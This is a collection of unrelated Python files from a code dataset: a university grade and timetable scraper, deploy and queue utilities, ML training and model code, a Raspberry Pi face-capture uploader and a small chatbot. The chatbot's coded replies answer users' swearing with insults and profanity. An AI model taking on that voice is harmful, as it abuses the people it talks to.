subprocess.call([\"cvlc\",\n \"v4l2:///dev/video0:chroma=h264:width=800:height=600\",\n \"--sout\", \"#standard{access=\\\"file\\\",dst=\\\"%s\\\"}\" %\n filename, \":demux=h264\", \"--run-time=%s\" %\n config.t_recording, \"vlc://quit\"],\n stdout=DEVNULL, stderr=DEVNULL)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sw/monitor/alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"642451","text":"import copy\nimport re\n\nfrom pyquery import PyQuery as pq\nfrom bs4 import BeautifulSoup\nfrom app.models.base import db\nfrom app.models.user_next_term_schedule import UserNextTermSchedule\nfrom app.models.user_schedule import UserSchedule\nfrom app.models.user_score import UserScore\nfrom app.spider.spiderbase import SpiderBase\nfrom utils import log, getuser_agent\n\n\nclass ZjcmSpider(SpiderBase):\n\n def __init__(self, session, username):\n self.xh = username # 学号\n self.name = ''\n self.score = []\n self.schedule = []\n self.next_term_schedule = []\n self.college = '浙江传媒学院'\n self.session = session\n self.index_url = \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(username)\n self.score_url = \"http://xuanke.cuz.edu.cn/xscjcx.aspx?\"\n self.schedule_url = \"http://xuanke.cuz.edu.cn/xskbcx.aspx?\"\n\n def get_score(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n score_url = self.score_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name, 'N121605')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n data = {\n \"ddlXN\": \"\",\n \"ddlXQ\": \"\",\n \"__VIEWSTATE\": \"\",\n \"__VIEWSTATEGENERATOR\": \"\",\n 
\"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"ddl_kcxz\": '',\n \"btn_zcj\": \"历年成绩\",\n \"hidLanguage\": \"\"\n }\n resp = self.session.get(score_url)\n soup = BeautifulSoup(resp.text, \"lxml\")\n data[\"__VIEWSTATEGENERATOR\"] = soup.find('input', id='__VIEWSTATEGENERATOR', attrs={'value': True}).get('value', '')\n data[\"__VIEWSTATE\"] = soup.find('input', id='__VIEWSTATE', attrs={'value': True}).get('value', '')\n data[\"__EVENTTARGET\"] = soup.find('input', id='__EVENTTARGET', attrs={'value': True}).get('value', '')\n data[\"__EVENTARGUMENT\"] = soup.find('input', id='__EVENTARGUMENT', attrs={'value': True}).get('value', '')\n\n score_html = self.session.post(score_url, data)\n soup = BeautifulSoup(score_html.content, 'html.parser')\n try:\n tr = soup.find('table').find_all('tr')\n for j in tr[1:]:\n td = j.find_all('td')\n xueqi = td[0].get_text().strip() + \"-\" + td[1].get_text().strip()\n course = td[3].get_text().strip()\n xuefen = td[6].get_text().strip()\n score = td[12].get_text().strip()\n jidian = td[7].get_text().strip()\n kind = td[4].get_text().strip()\n make_up = td[-5].get_text().strip()\n rebuild = td[-4].get_text().strip()\n if make_up or rebuild:\n score = make_up\n if '必' in kind:\n xuanxiu = '必'\n elif '选' in kind:\n xuanxiu = '选'\n else:\n xuanxiu = kind\n course_score = {\n 'xh': self.xh,\n 'name': self.name,\n \"course\": course,\n 'xuanxiu': xuanxiu,\n 'score': score,\n 'jidian': jidian,\n 'xueqi': xueqi,\n 'xuefen': xuefen,\n }\n self.score.append(course_score)\n return True\n except Exception as e:\n log(e, '*****未获取到考试成绩,可能本学期未进行过考试或未进行课程评价')\n return False\n\n def get_schedule(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n schedule_url = self.schedule_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name, 'N121603')\n headers = {\n \"User-Agent\": getuser_agent(),\n 
\"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": \"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n schedule_html = self.session.get(schedule_url)\n page = pq(schedule_html.text)\n trs = page('tr')\n tr_len = 0\n try:\n for tr in trs[2:14]:\n if tr_len == 0:\n tr_len = len(tr)\n if tr_len == len(tr):\n jie = tr[1].text\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[2]).text()\n tues = pq(tr[3]).text()\n wed = pq(tr[4]).text()\n thur = pq(tr[5]).text()\n fri = pq(tr[6]).text()\n sat = pq(tr[7]).text()\n sun = pq(tr[8]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.schedule.append(schedule)\n elif len(tr) == tr_len - 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[1]).text()\n tues = pq(tr[2]).text()\n wed = pq(tr[3]).text()\n thur = pq(tr[4]).text()\n fri = pq(tr[5]).text()\n sat = pq(tr[6]).text()\n sun = pq(tr[7]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.schedule.append(schedule)\n elif len(tr) != tr_len and len(tr) != 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n schedule = copy.deepcopy(self.schedule[-1])\n schedule['jie'] = jie\n self.schedule.append(schedule)\n except Exception as e:\n log(e, \"*****获取课表信息失败\")\n\n def get_next_schedule(self):\n index_html = self.session.get(self.index_url)\n soup = BeautifulSoup(index_html.content, 'html.parser')\n name = soup.find('span', id='xhxm').get_text()\n self.name = name.split('同学')[0]\n\n schedule_url = self.schedule_url + \"xh={}&xm={}&gnmkdm={}\".format(self.xh, self.name.encode('utf-8'), 'N121603')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": 
\"http://xuanke.cuz.edu.cn/xs_main.aspx?xh={}\".format(self.xh)\n }\n self.session.headers.update(headers)\n data = {\n \"__EVENTTARGET\": \"xqd\",\n \"__EVENTARGUMENT\": \"\",\n \"__LASTFOCUS\": \"\",\n \"__VIEWSTATE\": \"\",\n \"__VIEWSTATEGENERATOR\": '',\n \"xnd\": \"2019-2020\",\n \"xqd\": \"2\"\n }\n info_html = self.session.get(schedule_url)\n soup = BeautifulSoup(info_html.text, 'html.parser')\n data[\"__VIEWSTATEGENERATOR\"] = soup.find('input', id='__VIEWSTATEGENERATOR', attrs={'value': True}).get('value', '')\n data[\"__VIEWSTATE\"] = soup.find('input', id='__VIEWSTATE', attrs={'value': True}).get('value', '')\n data[\"__LASTFOCUS\"] = soup.find('input', id='__EVENTTARGET', attrs={'value': True}).get('value', '')\n data[\"__EVENTARGUMENT\"] = soup.find('input', id='__EVENTARGUMENT', attrs={'value': True}).get('value', '')\n headers = {\n \"User-Agent\": getuser_agent(),\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Referer\": schedule_url\n }\n self.session.headers.update(headers)\n schedule_html = self.session.post(schedule_url, data)\n page = pq(schedule_html.text)\n print(page)\n trs = page('tr')\n tr_len = 0\n try:\n for tr in trs[2:13]:\n if tr_len == 0:\n tr_len = len(tr)\n if tr_len == len(tr):\n jie = tr[1].text()\n jie = re.findall(r'\\d+', jie)\n mon = pq(tr[2]).text()\n tues = pq(tr[3]).text()\n wed = pq(tr[4]).text()\n thur = pq(tr[5]).text()\n fri = pq(tr[6]).text()\n sat = pq(tr[7]).text()\n sun = pq(tr[-1]).text()\n schedule = {\n 'name': self.name,\n 'xh': self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.next_term_schedule.append(schedule)\n elif len(tr) == tr_len - 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n print(jie)\n mon = pq(tr[1]).text()\n tues = pq(tr[2]).text()\n wed = pq(tr[3]).text()\n thur = pq(tr[4]).text()\n fri = pq(tr[5]).text()\n sat = pq(tr[6]).text()\n sun = pq(tr[-1]).text()\n schedule = {\n 'name': self.name,\n 'xh': 
self.xh,\n 'jie': jie,\n 'Mon': mon,\n 'Tues': tues,\n 'Wed': wed,\n 'Thur': thur,\n 'Fri': fri,\n 'Sat': sat,\n 'Sun': sun\n }\n self.next_term_schedule.append(schedule)\n elif len(tr) != tr_len and len(tr) != 1:\n jie = tr[0].text\n jie = re.findall(r'\\d+', jie)\n schedule = copy.deepcopy(self.schedule[-1])\n schedule['jie'] = jie\n self.next_term_schedule.append(schedule)\n except Exception as e:\n log(e, \"*****获取下学期课表信息失败\")\n\n def save_score(self, uid):\n status = self.get_score()\n with db.auto_commit():\n db.session.query(UserScore).filter(UserScore.uid == uid).delete()\n if status:\n for i in self.score:\n user_score = UserScore()\n score_dict = i\n score_dict['uid'] = uid\n user_score.setattr(score_dict)\n with db.auto_commit():\n db.session.add(user_score)\n return True\n else:\n return False\n\n def save_schedule(self, uid):\n self.get_schedule()\n with db.auto_commit():\n db.session.query(UserSchedule).filter(UserSchedule.uid == uid).delete()\n for i in self.schedule:\n user_schedule = UserSchedule()\n schedule_dict = i\n schedule_dict['uid'] = uid\n schedule_dict['xh'] = self.xh\n schedule_dict['name'] = self.name\n user_schedule.setattr(schedule_dict)\n with db.auto_commit():\n db.session.add(user_schedule)\n\n def save_next_term_schedule(self, uid):\n self.get_next_schedule()\n with db.auto_commit():\n db.session.query(UserNextTermSchedule).filter(UserNextTermSchedule.uid == uid).delete()\n for i in self.next_term_schedule:\n user_schedule = UserNextTermSchedule()\n schedule_dict = i\n schedule_dict['uid'] = uid\n schedule_dict['xh'] = self.xh\n schedule_dict['name'] = self.name\n user_schedule.setattr(schedule_dict)\n with db.auto_commit():\n db.session.add(user_schedule)\n","sub_path":"app/spider/zjcm/zjcm_spider.py","file_name":"zjcm_spider.py","file_ext":"py","file_size_in_byte":12825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266349639","text":"from fabdeploy.lib.utils import 
_AttrDict, _is_host\nfrom fabric.api import run,sudo,env,task \nfrom fabdeploy.servers import get_server\n\n@task\ndef configure():\n \"\"\"\n configures apache based on Host Type\n \"\"\"\n config = _AttrDict(\n wsgi = env.wsgi_path,\n home = env.home,\n root = env.path,\n admin = env.admin,\n server = ''.join(['www.',env.url]),\n venv_path = ''.join([env.home,'/.virtualenvs/',env.project_name]),\n errorlog = ''.join([env.log_path,'/error.log']),\n accesslog = ''.join([env.log_path,'/access.log']),\n )\n\n # get server and set configuration files\n server = get_server()\n server.configure(config)\n\ndef restart():\n \"\"\"\n restart apache server\n \"\"\"\n sudo('/etc/init.d/apache2 restart')\n","sub_path":"apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450687622","text":"import sys\nfrom multiprocessing import Lock, cpu_count\nfrom random import randint\nfrom time import sleep\n\nfrom .runner import runner\n\nfrom ..helpers.job import job as pjob\n\nlock = Lock()\n\nclass runner_queue (runner):\n\t\"\"\"\n\tThe base queue runner class\n\t@static variables:\n\t\tmaxsubmit: Maximum jobs submitted at one time. Default cpu_count()/2\n\t\tinterval: The interval to submit next batch of jobs. 
Default 30\n\t\"\"\"\n\t\n\tmaxsubmit = int (cpu_count()/2)\n\tinterval = 30 \n\t\n\tdef wait(self):\n\t\t\"\"\"\n\t\tWait for the job to finish\n\t\t\"\"\"\n\t\tif self.job.rc() == pjob.FAILED_RC: \n\t\t\treturn\n\t\t\t\n\t\tferr = open (self.job.errfile)\n\t\tfout = open (self.job.outfile)\n\t\tif self.p:\n\t\t\tself.p.wait()\n\t\t\tself.getpid()\n\t\t\tif self.job.proc.echo:\n\t\t\t\tlock.acquire()\n\t\t\t\tsys.stderr.write (ferr.read())\n\t\t\t\tsys.stdout.write (fout.read())\n\t\t\t\tlock.release()\n\t\t\n\t\tif not self.isRunning():\n\t\t\tferr.close()\n\t\t\tfout.close()\n\t\t\treturn\n\t\t\n\t\twhile self.job.rc() == pjob.EMPTY_RC:\n\t\t\tsleep (randint(20, 40))\n\t\t\tif self.job.proc.echo:\n\t\t\t\tlock.acquire()\n\t\t\t\tsys.stderr.write (''.join(ferr.readlines()))\n\t\t\t\tsys.stdout.write (''.join(fout.readlines()))\n\t\t\t\tlock.release()\n\t\t\t\t\n\t\t\tif not self.isRunning():\n\t\t\t\tbreak\n\t\t\t\n\t\tferr.close()\n\t\tfout.close()\n","sub_path":"pyppl/runners/runner_queue.py","file_name":"runner_queue.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"63303424","text":"import argparse\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nimport base_arg\nfrom model import CRNN\nfrom dataset import OCRDataLoader, map_and_count\n\nparser = argparse.ArgumentParser(parents=[base_arg.parser])\nparser.add_argument(\"-ta\", \"--train_annotation_paths\", type=str, required=True, help=\"The path of training data annnotation file.\")\nparser.add_argument(\"-va\", \"--val_annotation_paths\", type=str, help=\"The path of val data annotation file.\")\nparser.add_argument(\"-b\", \"--batch_size\", type=int, default=128, help=\"Batch size.\")\nparser.add_argument(\"-e\", \"--epochs\", type=int, default=5, help=\"Num of epochs to train.\")\nparser.add_argument(\"-r\", \"--learning_rate\", type=float, default=0.001, help=\"Learning 
rate.\")\nparser.add_argument(\"--checkpoint\", type=str, help=\"The checkpoint path. (Restore)\")\nparser.add_argument(\"--max_to_keep\", type=int, default=5, help=\"Max num of checkpoint to keep.\")\nparser.add_argument(\"--save_freq\", type=int, default=1, help=\"Save and validate interval.\")\nargs = parser.parse_args()\n\nwith open(args.table_path, \"r\") as f:\n INT_TO_CHAR = [char.strip() for char in f]\nNUM_CLASSES = len(INT_TO_CHAR)\nBLANK_INDEX = NUM_CLASSES - 1 # Make sure the blank index is what.\n\n@tf.function\ndef train_one_step(model, X, Y, optimizer):\n with tf.GradientTape() as tape:\n y_pred = model(X, training=True)\n loss = tf.nn.ctc_loss(labels=Y,\n logits=tf.transpose(y_pred, perm=[1, 0, 2]),\n label_length=None,\n logit_length=[y_pred.shape[1]]*y_pred.shape[0],\n blank_index=BLANK_INDEX)\n loss = tf.reduce_mean(loss)\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(grads_and_vars=zip(grads, model.trainable_variables))\n return loss\n\n@tf.function\ndef val_one_step(model, X, Y):\n y_pred = model(X, training=False)\n loss = tf.nn.ctc_loss(labels=Y,\n logits=tf.transpose(y_pred, perm=[1, 0, 2]),\n label_length=None,\n logit_length=[y_pred.shape[1]]*y_pred.shape[0],\n blank_index=BLANK_INDEX)\n loss = tf.reduce_mean(loss)\n decoded, neg_sum_logits = tf.nn.ctc_greedy_decoder(inputs=tf.transpose(y_pred, perm=[1, 0, 2]),\n sequence_length=[y_pred.shape[1]]*y_pred.shape[0],\n merge_repeated=True)\n return decoded, loss\n\nif __name__ == \"__main__\":\n train_dataloader = OCRDataLoader(args.train_annotation_paths, \n args.image_height, \n args.image_width, \n table_path=args.table_path,\n blank_index=BLANK_INDEX,\n shuffle=True, \n batch_size=args.batch_size)\n print(\"Num of training samples: {}\".format(len(train_dataloader)))\n if args.val_annotation_paths:\n val_dataloader = OCRDataLoader(args.val_annotation_paths,\n args.image_height,\n args.image_width,\n table_path=args.table_path,\n 
blank_index=BLANK_INDEX,\n batch_size=args.batch_size)\n print(\"Num of val samples: {}\".format(len(val_dataloader)))\n print(\"Num of classes: {}\".format(NUM_CLASSES))\n print(\"Blank index is {}\".format(BLANK_INDEX))\n localtime = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime())\n print(\"Start at {}\".format(localtime))\n\n model = CRNN(NUM_CLASSES, args.backbone)\n model.summary()\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(args.learning_rate,\n decay_steps=10000,\n decay_rate=0.96,\n staircase=True)\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\n\n checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)\n if args.checkpoint:\n localtime = args.checkpoint.rstrip(\"/\").split(\"/\")[-1]\n manager = tf.train.CheckpointManager(checkpoint, directory=\"./tf_ckpts/{}\".format(localtime), max_to_keep=args.max_to_keep)\n summary_writer = tf.summary.create_file_writer(\"./logs/{}\".format(localtime))\n checkpoint.restore(manager.latest_checkpoint)\n if manager.latest_checkpoint:\n print(\"Restored from {}\".format(manager.latest_checkpoint))\n else:\n print(\"Initializing from scratch\")\n\n avg_loss = tf.keras.metrics.Mean(name=\"train_loss\")\n val_avg_loss = tf.keras.metrics.Mean(name=\"val_loss\")\n\n for epoch in range(1, args.epochs + 1):\n with summary_writer.as_default():\n for X, Y in train_dataloader():\n loss = train_one_step(model, X, Y, optimizer)\n tf.summary.scalar(\"train_loss\", loss, step=optimizer.iterations)\n avg_loss.update_state(loss)\n print(\"[{} / {}] Mean train loss: {}\".format(epoch, args.epochs, avg_loss.result()))\n avg_loss.reset_states()\n if (epoch - 1) % args.save_freq == 0:\n saved_path = manager.save(checkpoint_number=epoch)\n print(\"Model saved to {}\".format(saved_path))\n if args.val_annotation_paths:\n num_correct_samples = 0\n for X, Y in val_dataloader():\n decoded, loss = val_one_step(model, X, Y)\n count = map_and_count(decoded, Y, INT_TO_CHAR)\n 
val_avg_loss.update_state(loss)\n num_correct_samples += count\n tf.summary.scalar(\"val_loss\", val_avg_loss.result(), step=epoch)\n tf.summary.scalar(\"val_accuracy(line, greedy decoder)\", num_correct_samples / len(val_dataloader), step=epoch)\n print(\"[{} / {}] Mean val loss: {}\".format(epoch, args.epochs, val_avg_loss.result()))\n print(\"[{} / {}] Accuracy(line, greedy decoder): {:.2f}\".format(epoch, args.epochs, num_correct_samples / len(val_dataloader)))\n val_avg_loss.reset_states()","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231614572","text":"# Learn Python the Hard Way\n# Exercise 17: More Files\n# 09/19/2016 \n# Please note that in order to use this script you have to\n# use the console input format of:\n# > python SCRIPTNAMEHERE.py FROMFILEHERE.txt # \t\t TOFILEHERE.txt\n\n\nfrom sys import argv\nfrom os.path import exists \n\nscript, from_file, to_file = argv \n\n\nprint(\"Copying from {from_file} to %(to_file)\")\n\nin_file = open(from_file)\nindata = in_file.read()\n\nprint(\"The input data is %d bytes long\" % len(indata))\n\nprint(\"Checking to make sure the destination file is present %s\" % exists(to_file))\n\nprint(\"Writing data to file...\")\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint(\"Done!!!\")\n\nout_file.close()\nin_file.close()","sub_path":"Notes/ReadingNotes/Books/LPTHW/Exercises/LPTHWCh17Exercise.py","file_name":"LPTHWCh17Exercise.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"251774069","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MNIST_2NN(nn.Module):\n \"\"\"\n A simple multilayer-perceptron with 2-hidden layers with 200 units each\n using ReLu activations\n\n Total Expected Params: 199,210\n \"\"\"\n def 
__init__(self):\n super(MNIST_2NN, self).__init__()\n\n self.fc1 = nn.Linear(28*28, 200)\n self.fc2 = nn.Linear(200, 200)\n self.fc3 = nn.Linear(200, 10)\n\n def forward(self, x):\n x = torch.flatten(x, 1)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n out = self.fc3(x)\n\n return x","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611766619","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#人物を検知した時に画像を撮影して撮��画像をS3に送信する\n\nimport boto3\nimport json\nimport cv2\nimport datetime\nimport time\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport os\nimport argparse\nimport shutil\n\n#人感センサ設定情報\nINTAVAL = 3\nSLEEPTIME = 5\nSENSOR_PIN = 18\nst = time.time()-INTAVAL\n\nGPIO.cleanup()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(SENSOR_PIN, GPIO.IN)\n\n#正面顔のHaar-like特徴分類器の保存先\nCASCADE_PASS = 'models/haarcascade_frontalface_alt.xml'\n\n#AWS関連設定情報\nREGION = 'us-east-1'\nACCESS_KEY = 'AWSのアクセスキーを入力'\nSECRET_KEY = 'AWSのシークレットアクセスキーを入力'\nIMG_NAME = 'photo.jpg'\nIMG_PASS = '~/workspace/' + IMG_NAME\nBUCKET_NAME = 'バケット名'\n\ndef camera(NUM): #webカメラで画像を1枚撮影し「NUM.jpg」として保存\n c = cv2.VideoCapture(0)\n r, img = c.read()\n T = datetime.datetime.now()\n NAME = str(NUM) + '.jpg'\n cv2.imwrite(NAME, img)\n\ndef photo_take(): #0.5秒ごとに画像を10枚撮影する。画像は\"1.jpg\"~\"10.jpg\"として保存\n for num in range(1,11):\n print (num)\n camera(num)\n time.sleep(0.5)\n\ndef trim():\n color = (255, 255, 255) #白\n #ファイル読み込み\n image = cv2.imread(PHOTO_NAME)\n #グレースケール変換\n image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #カスケード分類器の特徴量を取得する\n cascade = cv2.CascadeClassifier(CASCADE_PASS)\n #物体認識(顔認識)の実行\n facerect = cascade.detectMultiScale(\n image_gray, scaleFactor=1.1, minNeighbors=1, minSize=(1, 1))\n if len(facerect) <= 0:\n exit()\n #検出した顔を囲む矩形の作成\n for rect in facerect:\n cv2.rectangle(image, tuple(rect[0:2]),tuple(rect[0:2]+rect[2:4]), color, 
thickness=2)\n #認識結果の保存\n cv2.imwrite(\"detected.jpg\", image)\n for rect in facerect:\n #cv2.imwrite('demo.jpg', image[rect])\n print (rect)\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n \n # img[y: y + h, x: x + w] \n cv2.imwrite('photo.jpg', image[y:y+h, x:x+w])\ndef photo_up(): #AWS S3に画像\"photo.jpg\"をアップ\n s3 = boto3.resource('s3',region_name=REGION,aws_access_key_id=ACCESS_KEY,aws_secret_access_key=SECRET_KEY)\n data = open(IMG_NAME, 'rb')\n s3.Bucket(BUCKET_NAME).put_object(Key=IMG_NAME, Body=data)\n\n\nprint (\"人感センサー起動中\")\n\nwhile True:\n face_cascade = cv2.CascadeClassifier(CASCADE_PASS)\n print (\"...\")\n if(GPIO.input(SENSOR_PIN) == GPIO.HIGH) and (st + INTAVAL < time.time()):\n st = time.time()\n print(\"人を感知しました。撮影します。\")\n photo_take()\n print(\"顔を探しています...\")\n for n in range(1,11):\n PHOTO_NAME = str(n) + '.jpg'\n img = cv2.imread(PHOTO_NAME)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #顔を検知\n #顔を検知したらその位置座標が多次元配列に保存される\n faces = face_cascade.detectMultiScale(gray) \n FACES = np.array(faces)\n if (FACES.size > 0): #顔が見つかったとき\n print(\"顔を見つけました。トリミングします。\")\n trim()\n print(\"画像をAWSへ送ります。\")\n photo_up()\n print(\"送信完了\")\n break\n else:\n print(\"なし\")\n\n time.sleep(SLEEPTIME)\n","sub_path":"Raspi_camera_edit.py","file_name":"Raspi_camera_edit.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297660228","text":"\"\"\"\nThis is the template server side for ChatBot\n\"\"\"\nfrom bottle import route, run, template, static_file, request\nimport json\nimport random\n\nswear_words=[\"fuck\",\"shit\",\"prick\",\"cunt\", \"dumbass\",\"asshole\",\"twat\"]\n\ncurse_response=[\"you diseased rhinocerus' pisel\", \"You're so ugly you make the mirror cry\", \"screw you\", \"get lost\", \"fuck you\",\"u twat\"]\nstock_responses=[\"Hello, you may call me Boto, Gad, Hobart, I go by many names.\",\"If you're having a bad day, and you wish to vent, 
then we can have a curse out match (I won't tell anyone)\", \"Ask me the weather??\", \"How are you feeling?\", \"What is your favourite food\",\"okay, thank you\"]\n\nused_stock=[]\nused_curses=[]\n\njoke=\"A man walks into a bar.....ouch\"\nanimations=[\"afraid\", \"bored\", \"confused\",\"crying\",\"dancing\",\"dog\",\"excited\", \"giggling\",\"heartbroke\",\"inlove\",\"laughing\",\"money\",\"no\",\"ok\",\"takeoff\",\"waiting\"]\n\n\n@route('/', method='GET')\ndef index():\n return template(\"chatbot.html\")\n\n\n@route(\"/chat\", method='POST')\ndef chat():\n user_message = request.POST.get('msg')\n rsp=process_msg(user_message)\n return json.dumps({\"animation\": choose_mation(), \"msg\": rsp})\n\n\n@route(\"/test\", method='POST')\ndef chat():\n user_message = request.POST.get('msg')\n return json.dumps({\"animation\": \"inlove\", \"msg\": \"You are not my friend\"})\n\n\n@route('/js/', method='GET')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@route('/css/', method='GET')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@route('/images/', method='GET')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n run(host='localhost', port=7000)\n\ndef process_msg(msg):\n if check_if_swore(msg):\n return choose_curse(curse_response)\n elif msg==\"how are you?\":\n return \"fine thanks\"\n elif msg[-1]==\"?\":\n return \"My repotoire of understanding is slightly low- je ne comprends pas\"\n elif asked_joke(msg):\n return tell_joke()\n elif asked_for_weather(msg):\n return \"HaHaHa, the weather you ask, pffft,I ain't that advanced\"\n else:\n return choose_stock()\n\n\n\n\ndef check_if_swore(msg):\n words=msg.split()\n for word in words:\n if word in swear_words:\n return True\n return False\n\n\n\ndef choose_curse(type):\n global curse_response\n global used_curses\n length=len(curse_response)-1\n if length==-1:\n curse_response=used_stock\n index=random.randint(0,length)\n 
rsp=curse_response[index]\n used_curses.append(rsp)\n del curse_response[index]\n return rsp\n\ndef choose_stock():\n global stock_responses\n global used_stock\n length=len(stock_responses)-1\n if length==-1:\n stock_responses=used_stock\n index=random.randint(0,length)\n rsp=stock_responses[index]\n used_stock.append(rsp)\n del stock_responses[index]\n return rsp\n\ndef choose_mation():\n length=(len(animations))-1\n index=random.randint(0,length)\n return animations[index]\ndef asked_joke(msg):\n if \"joke\" in msg:\n return True\n else:\n return False\ndef tell_joke():\n return joke\n\n\ndef asked_for_weather(msg):\n if \"weather\" in msg:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"boto.py","file_name":"boto.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534124077","text":"\nimport unittest\n\nclass Solution(object):\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n i = 0\n j = len(height) - 1\n water = 0\n while i < j:\n minh = min(height[i], height[j])\n water = max(water, minh * (j - i))\n while(height[i] <= minh and i < j):\n i += 1\n while(height[j] <= minh and i < j):\n j -= 1\n return water\n\nclass TestSolution(unittest.TestCase):\n def test_1(self):\n s = Solution()\n self.assertEqual(12, s.maxArea([1, 2, 3, 2, 3, 2, 5, 1]))\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"container-with-most-water/lcode11.py","file_name":"lcode11.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326969614","text":"from GraphAPI import Graph\nfrom heapq import *\nfrom networkx.algorithms import *\nimport networkx as nx \nimport time \n\nclass Dijkstra(object):\n '''Dijkstra solution of shortest path'''\n\n def __init__(self, graph):\n #initialize 
the graph input\n self.graph = graph\n\n def solver(self, source):\n #create prioirty queue\n #Q<-makePQ()\n priorityQ = []\n #set distance from source to all the node as infinity\n #for each node u that is not s do: insert(Q,(u,infinity))\n dist = {x: float(\"inf\") for x in self.graph.bag}\n #set distance to source to be 0\n #insert(Q,(s,0))\n dist[source] = 0\n #push all the nodes to priority queue and set the parent of them as None\n \n #create a path tree to resturn in the end\n path = {}\n for node in self.graph.bag:\n heappush(priorityQ, (dist[node], node))\n path[node] = None\n #use visisted to keep track of nodes we visited \n #X<-emptyset\n visited = []\n \n\n \n #while queue is not empty\n #for i = 1 to |V| do\n while priorityQ:\n #extract node with minimum distance value\n #(v, dist(s, v)) = extractMin(Q)\n d, node = heappop(priorityQ)\n #add this node to visited set\n #X = X U {v}\n visited.append(node)\n #loop through neighbors of the current node\n #for each u in Adj(v) do\n for neighbor, weight in self.graph.adjacent[node]:\n #if neighbor has not been visited\n if neighbor not in visited: \n #relax the edge \n #decreaseKey(Q,(u,min(dist(s,u),dist(s,v)+l(v,u))))\n if dist[neighbor] > d + weight:\n dist[neighbor] = d + weight\n #set the parent of neighbor to be node\n path[neighbor] = node \n #push the neighbor to priority queue, which decrease key\n heappush(priorityQ, (dist[neighbor], neighbor))\n return dist, path \n\n'''testing\nif __name__ == \"__main__\":\n\n graph = 